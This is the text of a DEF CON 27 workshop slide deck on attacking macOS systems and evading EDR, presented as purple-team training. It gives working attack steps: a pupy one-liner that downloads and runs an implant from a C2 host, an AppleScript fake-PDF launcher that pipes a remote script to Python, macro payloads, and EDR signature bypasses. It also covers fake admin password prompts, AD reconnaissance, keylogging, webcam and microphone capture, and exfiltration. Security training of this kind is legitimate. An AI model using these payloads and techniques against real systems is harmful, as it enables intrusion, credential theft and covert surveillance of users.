DEF CON 27 - workshop - RICHARD GOLD - mind the gap

Commercial in Conﬁdence· www.digitalshadows.com
Taking advantage of cross-platform security solutions for MacOS/Linux
DEF CON Workshop 2019-08-10
Mind the Gap!

Commercial in Conﬁdence· www.digitalshadows.com2
Who are we?
Richard Gold Security Engineering team
Director of Security Engineering
@drshellface on Twitter
• Rob Curtis
• co-instructor
• Simon Hall
• Isidoros Monogioudis
• ...and more...

• Introduction
• Setup a pupy C2 server in a virtual environment (see the USB sticks)
• Initial Access
• creating a malicious macro-enabled document and/or a fake PDF with an AppleScript launcher
• Execution
• executing the payload to get a shell
• Credential Access
• what gets caught, what doesn’t - some simple tricks to get creds
• Discovery
• Active Directory recon
• Collection
• Screenshotting and friends
• Exfil
• Tips’n’tricks for exfil’ing your loot
• C2
• What works, what doesn’t
• Wrap-up
• Questions, comments, flames, etc.
Overview

Introduction

• MacOS has two main security features that we need to be aware of:
a. Gatekeeper: sets policy about which applications can be executed
b. XProtect: set of malware signatures which are blacklisted
• These systems are good for preventing the execution of malicious binaries which are
dropped to disk (Windows tradecraft in the 2000s)
• On Windows, attackers pivoted to Powershell and JS tooling
a. C# is another topic entirely :)
• Turns out that Python is installed by default on MacOS
a. Most Linux systems too
MacOS security systems

• Endpoint Detection and Response (EDR) are the next-gen AV solutions
• Have more advanced detection capabilities including in-memory scanning
• This is particularly useful to catch (default) Mimikatz and others!
• Also Response capabilities:
• Memory capture from a device
• Quarantine
• Forensics
EDR platform

• Many vendors of software and security promise cross-platform support
• Many EDR systems are cross-platform with vendors touting their ability to have
coverage of Windows, MacOS, Linux and more
• However, crossplatform support for security, especially for non-Windows platforms is
weak at best
• Even oﬀensive toolsets often are lacking features for MacOS!
• Similarly, security features in popular products, like Microsoft Oﬃce, vary drastically
from platform to platform
Crossplatform issues
7

• Purple Team assessments are a cornerstone of how we approach security
• We're big fans of the Mitre ATT&CK framework for both oﬀensive & defensive work
• You don't know how well something works until you test it
• “Right or wrong, it’s very pleasant to break something from time to time.”— Fyodor Dostoevsky
• Crossplatform security software is a challenge
• this applies to both oﬀensive and defensive tooling!
• Python to the rescue! :)
Motivation and Approach

• APTs do target MacOS
• Coinbase attack targeted MacOS users
• APT28 had a MacOS version of X-Agent (XAgentOSX) implant
• WindShift have the WindTail implant for MacOS
• Lazarus Group have the AppleJeus implant for MacOS
APTs

“MITRE’s Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK™) is a
curated knowledge base and model for cyber adversary behavior, reﬂecting the various
phases of an adversary’s lifecycle and the platforms they are known to target”
Mitre ATT&CK

Threat emulation: try out a number of open source tools, no point re-inventing the
square wheel, we're looking for eﬀective security, not points for style.
• Tool up! Install and conﬁgure the following toolkits to get started:
• Empire - https://github.com/EmpireProject/Empire
• Eggshell - https://github.com/neoneggplant/EggShell
• EvilOSX - https://github.com/Marten4n6/EvilOSX
• Pupy - https://github.com/n1nj4sec/pupy
• Following steps we took (titles of section) come from the Mitre ATT&CK framework:
https://attack.mitre.org/tactics/enterprise/
Planning

• If you already have VMWare Fusion, you can use that
Otherwise:
• Install Virtualbox on your MacOS device:
• https://download.virtualbox.org/virtualbox/6.0.8/VirtualBox-6.0.8-130520-OSX.dmg
• Or grab it from the USB stick
• Get the Kali image:
• https://images.oﬀensive-security.com/virtual-images/kali-linux-2019.2-vbox-amd64.ova
• Or grab it from the USB stick
C2 server OS setup

To install the Pupy server component:
• sudo apt install git libssl1.0-dev libffi-dev python-dev
python-pip build-essential swig tcpdump python-virtualenv
• git clone --recursive https://github.com/n1nj4sec/pupy
• python create-workspace.py -DG pupyws
• sudo -H pip install scapy --upgrade
• there is an installation issue with scapy 2.4.2 which pupy currently points at, 2.4.3 works though
• sudo pupyws/bin/pupysh
Pupy C2 server setup

• By default pupy listens on port 443 for C2 callbacks
• By default pupy uses port 9000 for staging the implant
• The above can be confusing and catch people out at the beginning, especially when
dealing with protected environments
• You can probably get 80 & 443 outbound to a cloud infra provider
• Create a Python one-liner for staging your pupy implant:
• gen -f py_oneliner
• Your one liner should look a bit like this:
• python -c 'import urllib;exec
urllib.urlopen("http://172.16.1.198:9000/d47OwioFmM/Zjlu5VIOkL").read()'
• The one liner will download and execute pupy in-memory
pupy

Experiment!
install pupy & test the one liner

Initial Access

• Our tried and true technique of spearphishing with a Macro-enabled document as an
attachment (T1193) or a link (T1192) is our go-to for attacking MacOS users
• While macros can be disabled across an organization now, it requires an MDM
solution to work effectively across a fleet of machines
• Certain users and functions, like payroll, often require macros to be enabled and
there is no "Trusted Locations" or signed Macro support in Office for Mac
Initial Access

• We will practice creating Macro-enabled documents in MS Office
• Note: While email filtering gateways may convert or block macro-enabled files,
Spearphishing with a Link (T1192) works exceptionally well for delivering a payload to
user
• Bonus points: use a well-known file locker like Dropbox or Google Drive to host your
payload
• You may need to zip up your payload to avoid prying eyes
Initial Access - Macros

• Generate osx/macro using Empyre
• git clone empire
• sudo ./setup/install.sh
• sudo ./empire
• listeners
• uselistener http
• usestage osx/macro
• Modify cmd to include (obfuscated) pupy one-liner
• OR
• use our Macro template from the USB stick
• Pro-tip:
• Need to add: Private Declare PtrSafe Function system Lib " /usr/lib/libc.dylib" Alias "popen"
(ByVal command As String, ByVal mode As String) as LongPtr
• A defender can block the import of the external library
• H/T https://www.slideshare.net/DannyChrastil/pwning-in-the-sandbox-osx-macro-exploitation
• Slide 42
Macro creation HOWTO

• Alternatively, use AppleScript as the launcher and use the ScriptEditor to create an
Application, H/T TokyoNeon -
https://null-byte.wonderhowto.com/how-to/hacking-macos-create-fake-pdf-trojan-wit
h-applescript-part-2-disguising-script-0184706/
• Host this on a well-known ﬁle locker for maximum pwnage
• EDR does not have the same sensitivity to AppleScript as PowerShell or JavaScript on
Windows
• You can try to follow the tutorial on the web page or grab the pre-packaged payload
from the USB stick
Fake PDF with AppleScript launcher

• The attack uses AppleScript to download and display a decoy PDF & run pupy
• do shell script "s=ATTACKER-IP-ADDRESS:PORT; curl -s $s/real.pdf |
open -f -a Preview.app & curl -s $s/script | python -"
• You need a web server (like python -m SimpleHTTPServer 8080) to serve up
the Python script and the decoy PDF
• By using tweaked icons and unicode obfuscation tricks it’s possible to make a really
convincing fake PDF
• Remember to use the string concat trick in your launcher if EDR is present!
Fake PDF with AppleScript launcher

Experiment!
Generate a malicious macro
and/or AppleScript document

Execution

A mixture of User Execution (T1204) and Scripting (T1064) is an obvious and effective
way to gain code execution
• Some tricks of the trade: need full file path to call out to the system library now in
Office 16+
• Our first EDR detection! Turns out vanilla Empire VBA macro is heavily-signatured by
our target EDR system and most likely others - does it get picked up with your EDR
system?
• It seems any piece of code from the Empire toolset is picked up, not just the launcher
Execution

• Bypass required us to go crude:
• "If they think you're crude, go technical; if they think you're technical, go crude. I'm a very technical
boy. So I decided to get as crude as possible" -- Johnny Mnemonic, William Gibson
• Practice stripping out all the "fancy" base64 encoding and executed the pupy python
one-liner directly - we've had success with this in the past
• If your EDR provider signatures the python one-liner, with the magical powers of
string concatenation, we can often bypass the signature
• But now in an Oﬃce sandbox - complicated as bypasses come and go - even without a
bypass, can still cat /etc/passwd undetected however
• https://www.mdsec.co.uk/2018/08/escaping-the-sandbox-microsoft-oﬃce-on-macos/ [obsolete]
• Some people (not me!) have reported success with:
• https://github.com/cldrn/macphish/wiki/Abusing-GrantAccessToMultipleFiles
Bypassing EDR

• Eggshell worked when executed directly
• Plot twist: binaries are not checked when dropped to disk (like traditional AV), but
only when they are executed, maybe a surprise to people not familiar with EDR
• Fixed now, but the reality of modern EDR is that you can drop a 24/58 VT scored binary onto disk
and have it executed without any problems
• EvilOSX worked when executed directly
• still does...! Although some EDR systems we have tried have detected it
Execution continued...

Experiment!
Execute payload from document,
try Eggshell, EvilOSX, ...

Credential Access

Any usage of the Empire credential stealers (T1003) gets immediately ﬂagged and
blocked (process killed), even from within pupy running in-memory as it drops the stealer
to disk
• EDR is pretty good at looking for programmatic access to credential stores
• We went crude, again, this time with FiveOnceInYourLife (H/T fuzzynop) (T1056)
• Let's try it out!
• https://github.com/fuzzynop/FiveOnceInYourLife
• (needs to be run in a non-sandbox environment)
Credential Access

• Command: FOIYL.py
• Prompt the user for admin credentials for an update, users are often conditioned to
do this with Slack and friends, simple bit of AppleScript triggered by osascript is a)
eﬀective & b) undetected
• Hey Presto! Local admin creds!
FiveOnceInYourLife

Experiment!
try FiveOnceInYourLife and/or
hashdump

Discovery

If your target is domain-joined, you’ll want to do some more investigating
• The in-scope Macs are all domain-joined and we would like to recon the Active
Directory environment, e.g., which groups are available (T1069) and which shares are
available (T1135)
• Our Windows testing revealed that all our standard net user/net group Active
Directory enumeration commands were picked up by the EDR system
• We were pleasantly surprised to discover that the MacOS-equivalent commands (dscl
and dsconﬁgad) which return exactly the same information as their Windows cousins
were completely undetected!
• List all Domain Admins, etc.
Discovery

We will not run these commands for real as we will not have an Active Directory
environment available, we will review their syntax and go over the expected output
• dscl . ls /Users
• dscl . read /Users/user.mcuserface
• dscl "/Active Directory/ABC/All Domains" ls /Users
• dscl "/Active Directory/ABC/All Domains" read /Users/service_account
• dscl "/Active Directory/ABC/All Domains" ls /Computers
• dscl "/Active Directory/ABC/All Domains" read "/Computers/XYZ"
• dscl . ls /Groups
• dscl . read "/Groups/powerusers"
• dscl "/Active Directory/ABC/All Domains" ls /Groups
• dscl "/Active Directory/ABC/All Domains" read "/Groups/ABCDomain
Admins"
• dsconfigad -show
Active Directory recon

EvilOSX has a function to discover the bookmarks stored by the browser which can be
helpful for revealing internal information (at least, internal system names), was also
undetected
Discovery continued

Experiment!
Try to steal bookmarks

Collection

Screen capture (T1113), webcam capture (T1125) and microphone capture (T1123) can all
be performed with pupy, EvilOSX and Eggshell
• All three types of collection from all three tools were undetected
• FIN7, APT28, etc. make extensive use of this form of collection
• We will try diﬀerent types of collection with the various tools
Collection

By default pupy comes with a variety of collection scripts (called “gather”)
• help -M to list available modules
• Just type the name of the module to use it, for example:
• screenshot (currently not working on Linux due to a dependency issue)
• keylogger (currently not working on MacOS)
• users
• get_info
pupy Collection

Experiment!
Explore the diﬀerent “gather”
modules, e.g., keylogger

Exﬁltration

Web Filtering is an issue but whitelists are often overly broad
• Our favourites are big name tech firms who also offer cloud hosting, e.g., Amazon
AWS, Microsoft Azure, Google Compute Platform, etc.
• Very difficult for organizations to differentiate between legit and non-legit data flows
to cloud providers
• The C2 channel works great in many cases (T1041)
Exfiltration

Experiment!
Try to exﬁl a ﬁle with pupy

Command and Control

• HTTPS is an obvious favourite (T1071)
• We'll review the diﬀerent options present in the tools
• Self-signed certs will get you caught
• Let's Encrypt to the rescue? (Future Work for keen attendees!)
• SSL Interception can still catch you out
• If you're lucky, the targets will drop oﬀ of the corporate network or the VPN
Command and Control

Wrap-up

• True feature parity across platforms is a myth
• MacOS is typically underserved by both crossplatform software and security
• We got T-shirts, but many questions still remain about EDR effectiveness on MacOS
• Going crude: even really basic techniques are enough to get you success
• Once you move off of the mainstream offensive toolsets (Empire), there's plenty of
options
• This workshop has walked you through the tools and processes you can use to break
in and out of protected MacOS environments
Conclusions

DEF CON 27 - workshop - RICHARD GOLD - mind the gap

More Related Content

Similar to DEF CON 27 - workshop - RICHARD GOLD - mind the gap (20)

More from Felipe Prado (20)

Recently uploaded (20)

DEF CON 27 - workshop - RICHARD GOLD - mind the gap